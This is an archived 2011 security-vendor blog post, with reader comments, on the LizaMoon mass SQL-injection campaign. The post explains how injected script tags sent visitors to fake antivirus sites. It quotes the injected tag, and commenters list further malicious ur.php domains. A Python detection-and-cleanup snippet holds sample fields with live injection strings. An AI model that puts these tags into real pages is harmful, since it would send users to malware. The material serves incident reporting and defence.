Websense Security Labs Blog

Websense Security Labs discovers, investigates and reports on advanced Internet threats that traditional security
research methods miss.

LizaMoon mass injection hits over 226,000 URLs (was 28,000)


Posted: 29 Mar 2011 10:15 | Patrik Runald | 31 comment(s)


Websense Security Labs and the Websense Threatseeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.


Updated information

We have updated information about the LizaMoon injection available here:

http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx


LizaMoon

The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page:


<script src=hxxp://lizamoon.com/ur.php></script>


According to a Google Search, over 28,000 URLs (since updated to 226,000) have been compromised. This includes several iTunes URLs, as you can see below:

And here is the injected code at one of those iTunes URLs:


The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple.
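As an added example (not Websense's own code), the following Python snippet scans stored content for the injected ur.php script tag described above and shows why HTML-encoding the field, as the post says iTunes does, leaves the reference visible but inert. The sample records and the function names are constructed for this illustration.

```python
import html
import re

# Pattern of the LizaMoon injection described in the post: a <script> tag whose
# src points at a /ur.php loader on any host, usually appended after </title>.
# Quotes around src are optional because the injected line on the page has none.
_INJECTED_SCRIPT = re.compile(
    r"<script\s+src=[\"']?(?P<src>[a-z]+://[^\s\"'>]+/ur\.php)[\"']?\s*>\s*</script>",
    re.IGNORECASE,
)

def find_injected_scripts(content: str) -> list[str]:
    """Return the src URLs of ur.php script tags found in stored content."""
    return [m.group("src") for m in _INJECTED_SCRIPT.finditer(content)]

def strip_injected_scripts(content: str) -> str:
    """Remove the injected tags (clean-up of a compromised database field)."""
    return _INJECTED_SCRIPT.sub("", content)

def neutralize(content: str) -> str:
    """HTML-encode the content so any embedded tag is shown as text, not run.
    This is the effect the post attributes to iTunes: the reference survives in
    the feed, but a renderer shows it as literal characters."""
    return html.escape(content, quote=True)

# Constructed sample records (not from the page): one clean feed item and two
# injected ones, the second using a later domain named in the comments.
SAMPLE_FIELDS = {
    "clean": "<title>Episode 12</title><p>Show notes</p>",
    "lizamoon": "<title>Episode 12</title><script src=http://lizamoon.com/ur.php></script>",
    "tadygus": '<title>Episode 12</title><script src="http://tadygus.com/ur.php"></script>',
}

def scan_fields(fields: dict[str, str]) -> dict[str, list[str]]:
    """Map each record id to the injected src URLs it contains (empty if clean)."""
    return {name: find_injected_scripts(body) for name, body in fields.items()}

if __name__ == "__main__":
    for name, hits in scan_fields(SAMPLE_FIELDS).items():
        print(f"{name}: {hits or 'clean'}")
    # The encoded form contains no live <script> tag at all.
    print(neutralize(SAMPLE_FIELDS["lizamoon"]))
```

The same scan can be pointed at a dump of title or description columns, since the post's injection lands in page content that is served from a database.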


The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site: hxxp://defender-uqko.in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet.


The domain lizamoon.com was registered three days ago with clearly fake information:


We'll keep monitoring this mass-injection attack and provide updated information as it's available.


UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.


UPDATE2: We have been monitoring the attack since it came out and noticed that the number of compromised URLs is still increasing, 380,000 URLs so far. Moreover, more domains besides lizamoon.com have started to be involved.



Comments

danieleran said on Tuesday, March 29, 2011 5:29 PM

You say it has infected iTunes links, then provide podcast feeds as proof, then note that Apple encodes URLs within the podcast feeds to prevent them from being executable.

This seems alarmist misinformation to run with as your headline.

Jonathan Cremin said on Wednesday, March 30, 2011 7:05

So long story short, iTunes has not in fact been compromised.

Patrik Runald said on Wednesday, March 30, 2011 10:30

Thanks for your feedback. We understand what you are saying, but we have stuck to reporting the facts. The podcasts in iTunes do contain the reference to the malicious site, it's just been neutered by Apple. In the blog we also commend Apple for doing so.

Jay Barnes said on Wednesday, March 30, 2011 11:54

Also observed hxxp://lizamoon.com/ur.php containing javascript redirect to hxxp://system-scanner-uyxt.co.cc/scan1b/237?sessionId=05005504[...], which was already a dead hostname by the time user received redirect.  Server that contained lizamoon.com reference for this user was hxxp://www.equusnow.com, which appears to be clean at the moment.

Similar (or identical) campaign may involve redirects to hxxp://system-scanner-eopa.co.cc containing fake-av.  Another compromised server, hxxp://hccems.com/hr-adriana-lima-vogue-spain/, earlier today contained javascript code redirecting to system-scanner-eopa.co.cc only if the request used a google referer.  That hccems.com page, with a google referer, currently redirects to hxxp://xz163v92.dyndns-ip.com/3/ (also fake-av).

Maye said on Wednesday, March 30, 2011 5:56 PM

This same attack is now happening with tadygus.com instead of lizamoon.

Jerry Mangiarelli said on Thursday, March 31, 2011 5:03

I've been following this one for a while and it dates back to Dec 2010, using the same method and files as lizamoon

"<script src hxxp://sol-stats.info/ur.php"

Bryan said on Thursday, March 31, 2011 5:39

694,000 hits at this time. It's growing.

rob davis said on Thursday, March 31, 2011 6:48

statement: itunes data has been updated with 3rd party data

statement: itunes has been compromised

statement: itunes users are unaffected due to the encoding performed by apple.

my question is where in the process has itunes got injected with code? could well be separate 3rd parties that supply apple.

DC said on Thursday, March 31, 2011 8:54

So, it looks more like a XSS attack to me, not SQL injection.

Or are you saying that there is some SQL injection being used to compromise these RSS feeds so that they contain XSS code?

If that is the case, where are the details on the actual SQL injection that is the root cause of this "issue"?  Without that information, how is anyone supposed to do anything to stop it?

Zo said on Thursday, March 31, 2011 9:35

But then you might as well say it's infected Google, because you can see the reference to the site in the Google search results. Really all that's happened is that all those little sites have been compromised, not iTunes and not Google.

vty said on Thursday, March 31, 2011 10:22

It looks like this injection has changed to hxxp://t6ryt56.info/ur.php as of at least last night.

Has anyone experienced this on non-2k3/MSSQL 2005 boxes? I've yet to find a 2k8 server affected.

If anyone needs assistance, if you google "lizamoon fix" you'll find my nick/domain and I've posted some useful find&replace (convert) sql queries. Don't mean to advertise here (thus no url), but when this first struck I had to spend quite a bit of time figuring out a sanitizing method post-inject.

Thanks to websense for following this.

Anirban said on Thursday, March 31, 2011 10:48

There are two more links that get injected in tandem with the lizamoon malware. This is a common trend for SQL injection. The following post provides more details.

www.stopthehacker.com/.../lizamoon-hack-mass-sql-injection

The two accompanying links are:

src=hxxp://t6ryt56.info/ur.php

src=hxxp://sol-stats.info/ur.php

Michel Chamberland said on Thursday, March 31, 2011 11:07

Can you elaborate as to why this is considered a mass SQL injection vs a persistent XSS attack?

Demetri Alekseev said on Thursday, March 31, 2011 12:04 PM

Still, the headline should not read as it does.  It insinuates that iTunes users are compromised. Why doesn't this mention MS Outlook or MS Explorer, both of which process RSS and both of which could be compromised no?  Is it that iTunes is a bigger headline and for the hit-ho factor, more juicy?  

Come, do tell us about Microsoft IE and how it processes the RSS and MS Outlook…  Is it that nobody is really impacted by this and it is a wild shot in the air (lisamoon) or is it that you did not report on the real liability?

Jason Haar said on Thursday, March 31, 2011 3:08 PM

Has anyone got logs of what the attack looks like? I'm wondering if snort (or other NIDS) will pick this attack?

Ben Peddell said on Thursday, March 31, 2011 3:37 PM

Searching for "</title><script src=http://*/ur.php" (www.google.com/search*%2Fur.php%22) returns about 3.78 million results, and this appears to be growing.

OrderZero said on Thursday, March 31, 2011 4:33 PM

Technically any showing of the script at all would indicate it's not being executed simply shown to the user meaning it's encoded (like your nice apology to apple.com after saying essentially iTunes is infected) so your Google estimation while extremely broad (seeing that Google indexes multiple pages from a website not just one each one being one more result therefore there may only be 226 websites infected with 1000 pages on each) is also extremely wrong.

In addition to this a simple SQL injection wouldn't allow a stacked SELECT let alone an INSERT so while it's possible it's automated it's highly unlikely it's a simple sql injection and more than likely some vulnerability in some web application somewhere.

Enjoy the hysteria public and remember it's always China's fault!

Patrik Runald said on Thursday, March 31, 2011 4:56 PM

All good feedback, thanks for submitting them.

We just published an update on what we've seen in the last 24h and it's clear it's getting worse. We also included our thoughts on the iTunes statement. Feel free to comment away on that post as well.

community.websense.com/.../update-on-lizamoon-mass-injection.aspx

Thanks,

Patrik

Calum said on Friday, April 01, 2011 10:02

Just did a little dissection of a website infected with the rogue code and I have found it. Norton helped as well

Calum said on Friday, April 01, 2011 10:13

Did a bit of research and found that the IP address is 95.64.9.18. It indicated in Whois that the IP is romanian... Lizamoon is one of the sites that used it.

Antony said on Friday, April 01, 2011 10:44

Just to be clear to those who actually know very little about database servers...a database server is not "vulnerable to SQL injection". Poorly-programmed and secured *applications* are vulnerable to SQL injection.

It really annoys me to see databases blamed for poor application development practices.

Daryol VanHyning said on Friday, April 01, 2011 1:11 PM

My email site was compromised

toyotawhizguy said on Friday, April 01, 2011 4:54 PM

You can block malicious sites by editing your "hosts" file using Notepad. For example, add the following line:

127.0.0.1 www.lizamoon.com #attack site 03/29/11

You can also list the site's IP address instead of the domain name:

127.0.0.1 95.64.9.18 #attack site 03/29/11

I maintain my "hosts" file as "read only" after editing, this protects it from malicious attacks.

Annabel said on Saturday, April 02, 2011 1:34

I'm just an ordinary member of Joe Public and have experienced no less than 3 of these attacks on my PC since January. The first was as a result of a google search for free text to put in Wordle.  Others were the results of searches for free images to use in a photoshop competition.  One of them resulted in a Trojan which was thankfully blocked by my anti-virus software.  I didn't hang around to take a screen shot!

Dave Usher said on Saturday, April 02, 2011 8:04

Any particular CMS involved such as Wordpress, or is this more across-the-board?

People of the World said on Saturday, April 02, 2011 8:05

I love how the first two comments were people just concerned Apple was even mentioned. Apple was then applauded for containing the scripts, yet not good enough. Haha, some Apple people just can't believe that their products might be fallible.

Pete said on Saturday, April 02, 2011 12:11 PM

I am still confused by the SQL injection reference. Usually, an SQL injection is a vulnerability in an application which is then exploited for a persistent XSS or CSRF. What application has the SQL injection vulnerability? I get that RSS may pick up the persistent XSS but it has to get into a DB to start with and it can't get into a DB without an app. Which app has the vulnerability?

Arun said on Saturday, April 02, 2011 8:39 PM

One of my websites was attacked by Lizamoon but the code is different. Identified and neutralized. Following is the code identified.

</title><script src=lizamoon.com/.../script></title><script">lizamoon.com/.../title><script src=lizamoon.com/.../script>

Does anyone know how this attack could have happened? Please share.

Thanks

Arun

David Dede said on Monday, April 04, 2011 7:02

Some more details about it (lots of other domains participating in this attack):

blog.sucuri.net/.../lizamoon-mass-sql-injection-ur-php-updates.html

thanks,

APK said on Tuesday, April 05, 2011 3:19

To toyotawhizguy - YOU CANNOT USE A HOSTS FILE LIKE THIS (as you stated):

127.0.0.1 95.64.9.18 #attack site 03/29/11

That you have to use a firewall for (making a rule to not communicate with 95.64.9.18) & you can do that in either a software based firewall program, OR, a router's rules tables for security.

This you CAN do though (which you also mentioned - block it by domain/host name in HOSTS):

127.0.0.1 www.lizamoon.com #attack site 03/29/11

Note - using 127.0.0.1 causes a loopback operation, & is longer (thus, less efficient) than is 0.0.0.0 (which works as a valid blocking address vs. known bad sites/servers, & on ALL forms of Windows).

I.E.-> 0.0.0.0 is 2 characters shorter PER LINE than is the loopback adapter address 127.0.0.1 also) & thus it is faster to read into your local DNS Clientside Cache OR the diskcache of the Operating System (since HOSTS files are just that, files).

However, better yet is 0 (but, this only works on Windows 2000/XP/Server 2003 nowadays & it is the shortest/fastest/most efficient of the 3 possibles you can use for "blocking addresses" vs. known malicious sites/servers).

Enjoy (that's for his reference or anyone else's using HOSTS vs. these malicious sites/servers lists that GOOD security articles of this nature produce, as this one clearly is!)

Alexander Peter Kowalski

apk

John said on Thursday, April 07, 2011 5:31 PM

We monitored an attack from a compromised web server on Monday and the source appeared to be a domain in Myanmar, Burma which was sending out commands to thousands of servers. We only picked it up when traffic on a switch port hit 100% and bursted through the day. A network sniff revealed traffic being sent via our compromised server to domains everywhere but the domain sending data to our server was in Burma. We isolated the server so we could do some in-house testing... interesting that the timing was co-incidental with the attack mentioned above.
